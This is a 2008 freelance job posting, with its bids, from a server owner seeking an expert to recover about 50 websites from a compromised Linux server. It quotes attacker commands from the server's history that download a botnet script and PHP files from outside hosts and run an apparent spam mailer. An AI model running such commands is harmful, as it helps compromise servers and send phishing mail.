Project Detail

Compromised Linux Server - HELP!!  

Compromised Linux Server - HELP!! is project number 213479
posted at Freelancer.com. Click here to post your own project.

 

| More Free Trial For New Buyers
 

Status:

Selected Providers: Aserdp

Budget: $100-300

Created: 01/14/2008 at 8:21 EST

Bid Count: 7

Average Bid:
$ 250

01/17/2008 at 8:21 EST

Project Creator: paulmeakin
Employer Rating: 10/1010/1010/1010/1010/1010/1010/1010/1010/1010/10 (4 reviews)

Bid On This Project
 

Description

OK...I have a self managed Fasthosts Linux server that has been compromised badly!

I have over 50 web sites on it and data and I really need some expert help to get the server back on track. SSH is available and I think that is all! None of the web sites seem to be responding but I am unsure if the sites have been deleted or it is a server problem!

I cannot stress that I need a real expert that understands Linux, Mysql, phpmyadmin etc......please do not try for this job if you THINK you can do it...I NEED AN EXPERT...A GOOD EXPERT.

Below is the email from Fasthosts regarding the problems!

If you can help please get in touch......Thanks...Paul

EMAIL
Thank you for getting back to us. I can confirm that the passwords we provided are correct, and SSH is accessible using them. Unfortunately, the Matrix CP is not going to work, as most of it is completely missing. It would usually reside in the /opt folder, but this is not present. Also, whilst looking through the command history to see why this happened, I have found several suspicious looking commands. Examples of this are:

lwp-download http://noden.110mb.com/botnet.txt
wget http://www.fb1.just-ribbit.com/lo0ol.php
lwp-download http://www.proxysxavast.xpg.com.br/email.txt
perl email.txt hehe.txt "" "Cartao com Carinho Para Voce" engTIM.html

There are lots more. It appears to me that the server has been compromised, and I must ask you to rebuild it as soon as is possible. There is no telling how far the attackers has got their claws in to the server, and also no telling whether they have removed pertinent logfiles relating to it. They have had root access, so they have not been limited at all. - EMAIL ENDS


Additional information submitted:

01/14/2008 at 8:52 EST:
Also I will want all of the sites and databases (DB's are only small) taking from the server, the server rebuilding which is a function provided by Fasthosts server management area and then all of the sites reinstating along with the databases and phpmyadmin to manage them etc....basically save my sites and databases perform a server rebuild and reinstate on a rebuilt clean server.


Messages Posted:0 View project clarification board Post message on project clarification board

Bid On This Project
 

If you are the project creator or one of the bidders Log In for more options

 

250

0 days

01-14-2008 11:03 EST

Ready to do it.

help

 

150

0 days

01-14-2008 13:13 EST

Please check your PMs. Thanks, D.Kolev

help

 

300

0 days

01-14-2008 09:40 EST

Can start immediately. Please ask any questions in PMB. My feedback shows all my server administration experience.

help

 

200

0 days

01-14-2008 18:37 EST

Please check the private message for details.

help

 

250

2 days

01-14-2008 12:38 EST

Ready to begin. Please see PM.

help

 

300

5 days

01-14-2008 12:17 EST

Please see PMs for more details. Best regards, Creaws team.

help

 

300

2 days

01-14-2008 08:35 EST

(No Feedback Yet)

Please, read PMB.

help


    Bid on this Project